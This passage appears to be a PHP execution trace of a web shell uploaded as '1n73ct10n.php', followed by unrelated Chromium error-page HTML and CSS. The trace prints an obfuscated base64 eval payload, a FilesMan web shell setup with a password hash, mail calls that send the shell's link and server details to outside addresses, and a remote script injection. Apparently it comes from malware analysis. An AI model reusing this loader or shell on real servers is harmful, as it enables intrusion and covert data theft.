"=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){  \r\n   \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n   \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("[email protected]", $b, $c);\r\nmail("[email protected]", $b, $c);\r\necho "<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>";\r\n?>\r\n</body>\r\n</html>\r\n'	/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	0
3		A						/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	4	$auth_pass = '9c80a1eaca699e2fc6b994721f8703bc'
3		A						/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	5	$color = '#00ff00'
3		A						/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	6	$default_action = 'FilesMan'
4	16	0	0.035885	1962320	define	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	7	2	'SELF_PATH'	'/var/www/html/uploads/1n73ct10n.php(4) : eval()\'d code(1) : eval()\'d code'
4	16	1	0.035921	1962424
4	16	R			TRUE
4	17	0	0.035945	1962352	strpos	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	8	2	'python-requests/2.25.1'	'Google'
4	17	1	0.035969	1962424
4	17	R			FALSE
4	18	0	0.035991	1962352	session_start	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	12	0
4	18	1	0.036136	1963104
4	18	R			TRUE
4	19	0	0.036160	1963104	error_reporting	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	13	1	0
4	19	1	0.036190	1963144
4	19	R			0
4	20	0	0.036209	1963104	ini_set	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	14	2	'error_log'	NULL
4	20	1	0.036234	1963176
4	20	R			''
4	21	0	0.036253	1963104	ini_set	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	15	2	'log_errors'	0
4	21	1	0.036275	1963176
4	21	R			'1'
4	22	0	0.036294	1963104	ini_set	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	16	2	'max_execution_time'	0
4	22	1	0.036318	1963208
4	22	R			'30'
4	23	0	0.036336	1963104	ini_set	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	17	2	'output_buffering'	0
4	23	1	0.036358	1963176
4	23	R			FALSE
4	24	0	0.036376	1963104	ini_set	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	18	2	'display_errors'	0
4	24	1	0.036397	1963176
4	24	R			''
4	25	0	0.036416	1963104	set_time_limit	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code(1) : eval()'d code	19	1	0
4	25	1	0.036438	1963168
4	25	R			FALSE
3	15	1	0.036506	1964616
2	7	1	0.036604	1188296
1	3	1	0.036615	1185800
1	26	0	0.036626	1185832	Error->__toString	0		Unknown	0	0
2	27	0	0.036648	1185912	Error->getTraceAsString	0		Unknown	0	0
2	27	1	0.036665	1186168
2	27	R			'#0 /var/www/html/uploads/1n73ct10n.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/1n73ct10n.php(4): eval()\n#2 {main}'
1	26	1	0.036746	1190304
1	26	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/1n73ct10n.php(4) : eval()\'d code(1) : eval()\'d code:20\nStack trace:\n#0 /var/www/html/uploads/1n73ct10n.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/1n73ct10n.php(4): eval()\n#2 {main}'
			0.036853	1110928
TRACE END   [2023-02-13 02:18:44.799820]


Generated HTML code

<html dir="ltr" lang="en"><head>
  <meta charset="utf-8">
  <meta name="color-scheme" content="light dark">
  <meta name="theme-color" content="#fff">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,
                                 maximum-scale=1.0, user-scalable=no">
  <title>localhost</title>
  <style>/* Copyright 2017 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

a {
  color: var(--link-color);
}

body {
  --background-color: #fff;
  --error-code-color: var(--google-gray-700);
  --google-blue-100: rgb(210, 227, 252);
  --google-blue-300: rgb(138, 180, 248);
  --google-blue-600: rgb(26, 115, 232);
  --google-blue-700: rgb(25, 103, 210);
  --google-gray-100: rgb(241, 243, 244);
  --google-gray-300: rgb(218, 220, 224);
  --google-gray-500: rgb(154, 160, 166);
  --google-gray-50: rgb(248, 249, 250);
  --google-gray-600: rgb(128, 134, 139);
  --google-gray-700: rgb(95, 99, 104);
  --google-gray-800: rgb(60, 64, 67);
  --google-gray-900: rgb(32, 33, 36);
  --heading-color: var(--google-gray-900);
  --link-color: rgb(88, 88, 88);
  --popup-container-background-color: rgba(0,0,0,.65);
  --primary-button-fill-color-active: var(--google-blue-700);
  --primary-button-fill-color: var(--google-blue-600);
  --primary-button-text-color: #fff;
  --quiet-background-color: rgb(247, 247, 247);
  --secondary-button-border-color: var(--google-gray-500);
  --secondary-button-fill-color: #fff;
  --secondary-button-hover-border-color: var(--google-gray-600);
  --secondary-button-hover-fill-color: var(--google-gray-50);
  --secondary-button-text-color: var(--google-gray-700);
  --small-link-color: var(--google-gray-700);
  --text-color: var(--google-gray-700);
  background: var(--background-color);
  color: var(--text-color);
  word-wrap: break-word;
}

.nav-wrapper .secondary-button {
  background: var(--secondary-button-fill-color);
  border: 1px solid var(--secondary-button-border-color);
  color: var(--secondary-button-text-color);
  float: none;
  margin: 0;
  padding: 8px 16px;
}

.hidden {
  display: none;
}

html {
  -webkit-text-size-adjust: 100%;
  font-size: 125%;
}

.icon {
  background-repeat: no-repeat;
  background-size: 100%;
}

@media (prefers-color-scheme: dark) {
  body {
    --background-color: var(--google-gray-900);
    --error-code-color: var(--google-gray-500);
    --heading-color: var(--google-gray-500);
    --link-color: var(--google-blue-300);
    --primary-button-fill-color-active: rgb(129, 162, 208);
    --primary-button-fill-color: var(--google-blue-300);
    --primary-button-text-color: var(--google-gray-900);
    --quiet-background-color: var(--background-color);
    --secondary-button-border-color: var(--google-gray-700);
    --secondary-button-fill-color: var(--google-gray-900);
    --secondary-button-hover-fill-color: rgb(48, 51, 57);
    --secondary-button-text-color: var(--google-blue-300);
    --small-link-color: var(--google-blue-300);
    --text-color: var(--google-gray-500);
  }
}
</style>
  <style>/* Copyright 2014 The Chromium Authors
   Use of this source code is governed by a BSD-style license that can be
   found in the LICENSE file. */

button {
  border: 0;
  border-radius: 4px;
  box-sizing: border-box;
  color: var(--primary-button-text-color);
  cursor: pointer;
  float: right;
  font-size: .875em;
  margin: 0;
  padding: 8px 16px;
  transition: box-shadow 150ms cubic-bezier(0.4, 0, 0.2, 1);
  user-select: none;
}

[dir='rtl'] button {
  float: left;
}

.bad-clock button,
.captive-portal button,
.https-only button,
.insecure-form button,
.lookalike-url button,
.main-frame-blocked button,
.neterror button,
.pdf button,
.ssl button,
.enterprise-block button,
.enterprise-warn button,
.safe-browsing-billing button {
  background: var(--primary-button-fill-color);
}

button:active {
  background: var(--primary-button-fill-color-active);
  outline: 0;
}

#debugging {
  display: inline;
  overflow: auto;
}

.debugging-content {
  line-height: 1em;
  margin-bottom: 0;
  margin-top: 1em;
}

.debugging-content-fixed-width {
  display: block;
  font-family: monospace;
  font-size: 1.2em;
  margin-top: 0.5em;
}

.debugging-title {
  font-weight: bold;
}

#details {
  margin: 0 0 50px;
}

#details p:not(:first-of-type) {
  margin-top: 20px;
}

.secondary-button:active {
  border-color: white;
  box-shadow: 0 1px 2px 0 rgba(60, 64, 67, .3),
      0 2px 6px 2px rgba(60, 64, 67, .15);
}

.secondary-button:hover {
  background: var(--secondary-button-hover-fill-color);
  border-color: var(--secondary-button-hover-border-color);
  text-decoration: none;
}

.error-code {
  color: var(--error-code-color);
  font-size: .8em;
  margin-top: 12px;
  text-transform: uppercase;
}

#error-debugging-info {
  font-size: 0.8em;
}

h1 {
  color: var(--heading-color);
  font-size: 1.6em;
  font-weight: normal;
  line-height: 1.25em;
  margin-bottom: 16px;
}

h2 {
  font-size: 1.2em;
  font-weight: normal;
}

.icon {
  height: 72px;
  margin: 0 0 40px;
  width: 72px;
}

input[type=checkbox] {
  opacity: 0;
}

input[type=checkbox]:focus ~ .checkbox::after {
  outline: -webkit-focus-ring-color auto 5px;
}

.interstitial-wrapper {
  box-sizing: border-box;
  font-size: 1em;
  line-height: 1.6em;
  margin: 14vh auto 0;
  max-width: 600px;
  width: 100%;
}

#main-message > p {
  display: inline;
}

#extended-reporting-opt-in {
  font-size: .875em;
  margin-top: 32px;
}

#extended-reporting-opt-in label {
  display: grid;
  grid-template-columns: 1.8em 1fr;
  position: relative;
}

#enhanced-protection-message {
  border-radius: 4px;
  font-size: 1em;
  margin-top: 32px;
  padding: 10px 5px;
}

#enhanced-protection-message label {
  display: grid;
  grid-template-columns: 2.5em 1fr;
  position: relative;
}

#enhanced-protection-message div {
  margin: 0.5em;
}

#enhanced-protection-message .icon {
  height: 1.5em;
  vertical-align: middle;
  width: 1.5em;
}

.nav-wrapper {
  margin-top: 51px;
}

.nav-wrapper::after {
  clear: both;
  content: '';
  display: table;
  width: 100%;
}

.small-link {
  color: var(--small-link-color);
  font-size: .875em;
}

.checkboxes {
  flex: 0 0 24px;
}

.checkbox {
  --padding: .9em;
  background: transparent;
  display: block;
  height: 1em;
  left: -1em;
  padding-inline-start: var(--padding);
  position: absolute;
  right: 0;
  top: -.5em;
  width: 1em;
}

.checkbox::after {
  border: 1px solid white;
  border-radius: 2px;
  content: '';
  height: 1em;
  left: var(--padding);
  position: absolute;
  top: var(--padding);
  width: 1em;
}

.checkbox::before {
  background: transparent;
  border: 2px solid white;
  border-inline-end-width: 0;
  border-top-width: 0;
  content: '';
  height: .2em;
  left: calc(.3em + var(--padding));
  opacity: 0;
  position: absolute;
  top: calc(.3em  + var(--padding));
  transform: rotate(-45deg);
  width: .5em;
}

input[type=checkbox]:checked ~ .checkbox::before {
  opacity: 1;
}

#recurrent-error-message {
  background: #ededed;
  border-radius: 4px;
  margin-bottom: 16px;
  margin-top: 12px;
  padding: 12px 16px;
}

.showing-recurrent-error-message #extended-reporting-opt-in {
  margin-top: 16px;
}

.showing-recurrent-error-message #enhanced-protection-message {
  margin-top: 16px;
}

@media (max-width: 700px) {
  .interstitial-wrapper {
    padding: 0 10%;
  }

  #error-debugging-info {
    overflow: auto;
  }
}

@media (max-width: 420px) {
  button,
  [dir='rtl'] button,
  .small-link {
    float: none;
    font-size: .825em;
    font-weight: 500;
    margin: 0;
    width: 100%;
  }

  button {
    padding: 16px 24px;
  }

  #details {
    margin: 20px 0 20px 0;
  }

  #details p:not(:first-of-type) {
    margin-top: 10px;
  }

  .secondary-button:not(.hidden) {
    display: block;
    margin-top: 20px;
    text-align: center;
    width: 100%;
  }

  .interstitial-wrapper {
    padding: 0 5%;
  }

  #extended-reporting-opt-in {
    margin-top: 24px;
  }

  #enhanced-protection-message {
    margin-top: 24px;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

/**
 * Mobile specific styling.
 * Navigation buttons are anchored to the bottom of the screen.
 * Details message replaces the top content in its own scrollable area.
 */

@media (max-width: 420px) {
  .nav-wrapper .secondary-button {
    border: 0;
    margin: 16px 0 0;
    margin-inline-end: 0;
    padding-bottom: 16px;
    padding-top: 16px;
  }
}

/* Fixed nav. */
@media (min-width: 240px) and (max-width: 420px) and
       (min-height: 401px),
       (min-width: 421px) and (min-height: 240px) and
       (max-height: 560px) {
  body .nav-wrapper {
    background: var(--background-color);
    bottom: 0;
    box-shadow: 0 -12px 24px var(--background-color);
    left: 0;
    margin: 0 auto;
    max-width: 736px;
    padding-inline-end: 24px;
    padding-inline-start: 24px;
    position: fixed;
    right: 0;
    width: 100%;
    z-index: 2;
  }

  .interstitial-wrapper {
    max-width: 736px;
  }

  #details,
  #main-content {
    padding-bottom: 40px;
  }

  #details {
    padding-top: 5.5vh;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  body {
    margin: 0 auto;
  }

  button,
  [dir='rtl'] button,
  button.small-link,
  .nav-wrapper .secondary-button {
    font-family: Roboto-Regular,Helvetica;
    font-size: .933em;
    margin: 6px 0;
    transform: translatez(0);
  }

  .nav-wrapper {
    box-sizing: border-box;
    padding-bottom: 8px;
    width: 100%;
  }

  #details {
    box-sizing: border-box;
    height: auto;
    margin: 0;
    opacity: 1;
    transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  #details.hidden,
  #main-content.hidden {
    height: 0;
    opacity: 0;
    overflow: hidden;
    padding-bottom: 0;
    transition: none;
  }

  h1 {
    font-size: 1.5em;
    margin-bottom: 8px;
  }

  .icon {
    margin-bottom: 5.69vh;
  }

  .interstitial-wrapper {
    box-sizing: border-box;
    margin: 7vh auto 12px;
    padding: 0 24px;
    position: relative;
  }

  .interstitial-wrapper p {
    font-size: .95em;
    line-height: 1.61em;
    margin-top: 8px;
  }

  #main-content {
    margin: 0;
    transition: opacity 100ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  .small-link {
    border: 0;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
    margin: 0;
  }
}

@media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

@media (min-height: 400px) and (orientation:portrait) {
  .interstitial-wrapper {
    margin-bottom: 145px;
  }
}

@media (min-height: 299px) {
  .nav-wrapper {
    padding-bottom: 16px;
  }
}

@media (max-height: 560px) and (min-height: 240px) and (orientation:landscape) {
  .extended-reporting-has-checkbox #details {
    padding-bottom: 80px;
  }
}

@media (min-height: 500px) and (max-height: 650px) and (max-width: 414px) and
       (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 7vh;
  }
}

@media (min-height: 650px) and (max-width: 414px) and (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

/* Small mobile screens. No fixed nav. */
@media (max-height: 400px) and (orientation: portrait),
       (max-height: 239px) and (orientation: landscape),
       (max-width: 419px) and (max-height: 399px) {
  .interstitial-wrapper {
    display: flex;
    flex-direction: column;
    margin-bottom: 0;
  }

  #details {
    flex: 1 1 auto;
    order: 0;
  }

  #main-content {
    flex: 1 1 auto;
    order: 0;
  }

  .nav-wrapper {
    flex: 0 1 auto;
    margin-top: 8px;
    order: 1;
    padding-inline-end: 0;
    padding-inline-start: 0;
    position: relative;
    width: 100%;
  }

  button,
  .nav-wrapper .secondary-button {
    padding: 16px 24px;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 239px) and (orientation: portrait) {
  .nav-wrapper {
    padding-inline-end: 0;
    padding-inline-start: 0;
  }
}
</style>
  <style>/* Copyright 2013 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

/* Don't use the main frame div when the error is in a subframe. */
html[subframe] #main-frame-error {
  display: none;
}

/* Don't use the subframe error div when the error is in a main frame. */
html:not([subframe]) #sub-frame-error {
  display: none;
}

h1 {
  margin-top: 0;
  word-wrap: break-word;
}

h1 span {
  font-weight: 500;
}

a {
  text-decoration: none;
}

.icon {
  -webkit-user-select: none;
  display: inline-block;
}

.icon-generic {
  /* Can't access chrome://theme/IDR_ERROR_NETWORK_GENERIC from an untrusted
   * renderer process, so embed the resource manually. */
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAENJREFUeF7tzbEJACEQRNGBLeAasBCza2lLEGx0CxFGG9hBMDDxRy/72O9FMnIFapGylsu1fgoBdkXfUHLrQgdfrlJN1BdYBjQQm3UAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQAQMAAADdiHD7AAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x);
}

.icon-offline {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAGxJREFUeF7tyMEJwkAQRuFf5ipMKxYQiJ3Z2nSwrWwBA0+DQZcdxEOueaePp9+dQZFB7GpUcURSVU66yVNFj6LFICatThZB6r/ko/pbRpUgilY0Cbw5sNmb9txGXUKyuH7eV25x39DtJXUNPQGJtWFV+BT/QAAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQBAMAAAAVaP+LAAAAGFBMVEUAAABTU1NNTU1TU1NPT09SUlJSUlJTU1O8B7DEAAAAB3RSTlMAoArVKvVgBuEdKgAAAJ1JREFUeF7t1TEOwyAMQNG0Q6/UE+RMXD9d/tC6womIFSL9P+MnAYOXeTIzMzMzMzMzaz8J9Ri6HoITmuHXhISE8nEh9yxDh55aCEUoTGbbQwjqHwIkRAEiIaG0+0AA9VBMaE89Rogeoww936MQrWdBr4GN/z0IAdQ6nQ/FIpRXDwHcA+JIJcQowQAlFUA0MfQpXLlVQfkzR4igS6ENjknm/wiaGhsAAAAASUVORK5CYII=) 2x);
  position: relative;
}

.icon-disabled {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHAAAABICAMAAAAZF4G5AAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAASZJREFUeAHd11Fq7jAMRGGf/W/6PoWB67YMqv5DybwG/CFjRuR8JBw3+ByiRjgV9W/TJ31P0tBfC6+cj1haUFXKHmVJo5wP98WwQ0ZCbfUc6LQ6VuUBz31ikADkLMkDrfUC4rR6QGW+gF6rx7NaHWCj1Y/W6lf4L7utvgBSt3rBFSS/XBMPUILcJINHCBWYUfpWn4NBi1ZfudIc3rf6/NGEvEA+AsYTJozmXemjXeLZAov+mnkN2HfzXpMSVQDnGw++57qNJ4D1xitA2sJ+VAWMygSEaYf2mYPTjZfk2K8wmP7HLIH5Mg4/pP+PEcDzUvDMvYbs/2NWwPO5vBdMZE4EE5UTQLiBFDaUlTDPBRoJ9HdAYIkIo06og3BNXtCzy7zA1aXk5x+tJARq63eAygAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAACQAQMAAAArwfVjAAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAAYdJREFUeF7F1EFqwzAUBNARAmVj0FZe5QoBH6BX+dn4GlY2PYNzGx/A0CvkCIJuvIraKJKbgBvzf2g62weDGD7CYggpfFReis4J0ey9EGFIiEQQojFSlA9kSIiqd0KkFjKsewgRbStEN19mxUPTtmW9HQ/h6tyqNQ8NlSMZdzyE6qkoE0trVYGFm0n1WYeBhduzwbwBC7voS+vIxfeMjeaiLxsMMtQNwMPtuew+DjzcTHk8YMfDknEcIUOtf2lVfgVH3K4Xv5PRYAXRVMtItIJ3rfaCIVn9DsTH2NxisAVRex2Hh3hX+/mRUR08bAwPEYsI51ZxWH4Q0SpicQRXeyEaIug48FEdegARfMz/tADVsRciwTAxW308ehmC2gLraC+YCbV3QoTZexa+zegAEW5PhhgYfmbvJgcRqngGByOSXdFJcLk2JeDPEN0kxe1JhIt5FiFA+w+ItMELsUyPF2IaJ4aILqb4FbxPwhImwj6JauKgDUCYaxmYIsd4KXdMjIC9ItB5Bn4BNRwsG0XM2nwAAAAASUVORK5CYII=) 2x);
  width: 112px;
}

.hidden {
  display: none;
}

#suggestions-list a {
  color: var(--google-blue-600);
}

#suggestions-list p {
  margin-block-end: 0;
}

#suggestions-list ul {
  margin-top: 0;
}

.single-suggestion {
  list-style-type: none;
  padding-inline-start: 0;
}

#error-information-button {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBmaWxsPSJub25lIiBkPSJNMCAwaDI0djI0SDB6Ii8+PHBhdGggZD0iTTExIDE4aDJ2LTJoLTJ2MnptMS0xNkM2LjQ4IDIgMiA2LjQ4IDIgMTJzNC40OCAxMCAxMCAxMCAxMC00LjQ4IDEwLTEwUzE3LjUyIDIgMTIgMnptMCAxOGMtNC40MSAwLTgtMy41OS04LThzMy41OS04IDgtOCA4IDMuNTkgOCA4LTMuNTkgOC04IDh6bTAtMTRjLTIuMjEgMC00IDEuNzktNCA0aDJjMC0xLjEuOS0yIDItMnMyIC45IDIgMmMwIDItMyAxLjc1LTMgNWgyYzAtMi4yNSAzLTIuNSAzLTUgMC0yLjIxLTEuNzktNC00LTR6Ii8+PC9zdmc+);
  height: 24px;
  vertical-align: -.15em;
  width: 24px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup {
  align-items: center;
  background-color: var(--popup-container-background-color);
  display: flex;
  height: 100%;
  left: 0;
  position: fixed;
  top: 0;
  width: 100%;
  z-index: 100;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-content > p {
  margin-bottom: 11px;
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list ul {
  margin-inline-start: 15px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-box {
  background-color: var(--background-color);
  left: 5%;
  padding-bottom: 15px;
  padding-top: 15px;
  position: fixed;
  width: 90%;
  z-index: 101;
}

.use-popup-container#error-information-popup-container div.error-code {
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list p {
  margin-inline-start: 20px;
}

:not(.use-popup-container)#error-information-popup-container
  #error-information-popup-close {
  display: none;
}

#error-information-popup-close {
  margin-bottom: 0;
  margin-inline-end: 35px;
  margin-top: 15px;
  text-align: end;
}

.link-button {
  color: rgb(66, 133, 244);
  display: inline-block;
  font-weight: bold;
  text-transform: uppercase;
}

#sub-frame-error-details {

  color: #8F8F8F;

  /* Not done on mobile for performance reasons. */
  text-shadow: 0 1px 0 rgba(255,255,255,0.3);

}

[jscontent=hostName],
[jscontent=failedUrl] {
  overflow-wrap: break-word;
}

.secondary-button {
  background: #d9d9d9;
  color: #696969;
  margin-inline-end: 16px;
}

.snackbar {
  background: #323232;
  border-radius: 2px;
  bottom: 24px;
  box-sizing: border-box;
  color: #fff;
  font-size: .87em;
  left: 24px;
  max-width: 568px;
  min-width: 288px;
  opacity: 0;
  padding: 16px 24px 12px;
  position: fixed;
  transform: translateY(90px);
  will-change: opacity, transform;
  z-index: 999;
}

.snackbar-show {
  -webkit-animation:
    show-snackbar 250ms cubic-bezier(0, 0, 0.2, 1) forwards,
    hide-snackbar 250ms cubic-bezier(0.4, 0, 1, 1) forwards 5s;
}

@-webkit-keyframes show-snackbar {
  100% {
    opacity: 1;
    transform: translateY(0);
  }
}

@-webkit-keyframes hide-snackbar {
  0% {
    opacity: 1;
    transform: translateY(0);
  }
  100% {
    opacity: 0;
    transform: translateY(90px);
  }
}

.suggestions {
  margin-top: 18px;
}

.suggestion-header {
  font-weight: bold;
  margin-bottom: 4px;
}

.suggestion-body {
  color: #777;
}

/* Decrease padding at low sizes. */
@media (max-width: 640px), (max-height: 640px) {
  h1 {
    margin: 0 0 15px;
  }
  .suggestions {
    margin-top: 10px;
  }
  .suggestion-header {
    margin-bottom: 0;
  }
}

#download-link,
#download-link-clicked {
  margin-bottom: 30px;
  margin-top: 30px;
}

#download-link-clicked {
  color: #BBB;
}

#download-link::before,
#download-link-clicked::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

#download-link-clicked::before {
  opacity: 0;
  width: 0;
}

#offline-content-list-visibility-card {
  border: 1px solid white;
  border-radius: 8px;
  display: flex;
  font-size: .8em;
  justify-content: space-between;
  line-height: 1;
}

#offline-content-list.list-hidden #offline-content-list-visibility-card {
  border-color: rgb(218, 220, 224);
}

#offline-content-list-visibility-card > div {
  padding: 1em;
}

#offline-content-list-title {
  color: var(--google-gray-700);
}

#offline-content-list-show-text,
#offline-content-list-hide-text {
  color: rgb(66, 133, 244);
}

/* Hides the "hide" text div when the offline content list is collapsed/hidden
 * and, alternatively, hides the "show" text div when the offline content list
 * is expanded/shown.
 */
#offline-content-list.list-hidden #offline-content-list-hide-text,
#offline-content-list:not(.list-hidden) #offline-content-list-show-text {
  display: none;
}

/* Controls the animation of the offline content list when it is expanded/shown.
 */
#offline-content-suggestions {
  /* Max-height has to be set for the height animation to work. The chosen value
   * is a little greater than the maximum height the list will have, when all
   * suggestions have images, so that it is never clamped. This makes so that
   * when the actual height is smaller then the animation is not as smooth.
   */
  max-height: 27em;
  transition: max-height 200ms ease-in, visibility 0s 200ms,
              opacity 200ms 200ms linear;
}

/* Controls the animation of the offline content list when it is
 * collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-suggestions {
  max-height: 0;
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms,
              max-height 200ms 200ms ease-out;
  visibility: hidden;
}

#offline-content-list {
  margin-inline-start: -5%;
  width: 110%;
}

/* The selectors below adjust the "overflow" of the suggestion cards contents
 * based on the same screen size based strategy used for the main frame, which
 * is applied by the `interstitial-wrapper` class. */
@media (max-width: 420px)  {
  #offline-content-list {
    margin-inline-start: -2.5%;
    width: 105%;
  }
}
@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  #offline-content-list {
    margin-inline-start: -12px;
    width: calc(100% + 24px);
  }
}

.suggestion-with-image .offline-content-suggestion-thumbnail {
  flex-basis: 8.2em;
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-thumbnail > img {
  height: 100%;
  width: 100%;
}

.suggestion-with-image #offline-content-list:not(.is-rtl)
.offline-content-suggestion-thumbnail > img {
  border-bottom-right-radius: 7px;
  border-top-right-radius: 7px;
}

.suggestion-with-image #offline-content-list.is-rtl
.offline-content-suggestion-thumbnail > img {
  border-bottom-left-radius: 7px;
  border-top-left-radius: 7px;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail {
  align-items: center;
  display: flex;
  justify-content: center;
  min-height: 4.2em;
  min-width: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div {
  align-items: center;
  background-color: rgb(241, 243, 244);
  border-radius: 50%;
  display: flex;
  height: 2.3em;
  justify-content: center;
  width: 2.3em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div > img {
  height: 1.45em;
  width: 1.45em;
}

.offline-content-suggestion-favicon {
  height: 1em;
  margin-inline-end: 0.4em;
  width: 1.4em;
}

.offline-content-suggestion-favicon > img {
  height: 1.4em;
  width: 1.4em;
}

.no-favicon .offline-content-suggestion-favicon {
  display: none;
}

.image-video {
